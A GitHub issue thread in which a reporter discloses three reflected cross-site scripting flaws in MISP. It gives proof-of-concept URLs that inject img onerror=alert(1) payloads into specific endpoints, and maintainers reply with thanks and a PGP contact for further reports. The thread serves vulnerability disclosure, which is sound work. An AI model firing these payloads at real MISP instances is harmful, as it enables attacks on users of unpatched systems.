### ISSUE TITLE
XSS in 3 pages

### ISSUE THREAD

**Issue by import-au** [MISP/MISP#2381]
3 Cross-Site Scripting vulnerabilities on various pages. 

1. Injection occurs when script text is appended to the URL after a .json file location: http://192.168.56.50/events/updateGraph/685.json%3cimg%20src%3da%20onerror%3dalert(1)%3e
2. Injection occurs when script text is appended to the URL after a valid event identifier: http://192.168.56.50/templates/templateChoices/684%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E
3. Injection occurs when script text is appended to the URL after a valid event identifier: http://192.168.56.50/logs/event_index/685%22%3e%3cimg%20src%3da%20onerror%3dalert(1)%3e

**Comment by iglocska** [comment]
Thanks a lot for the reports!

**Comment by adulau** [comment]
If you find any other security issues or vulnerabilities, don't hesitate to send PGP messages to info@circl.lu 

`CA57 2205 C002 4E06 BA70 BE89 EAAD CFFC 22BD 4CD5`
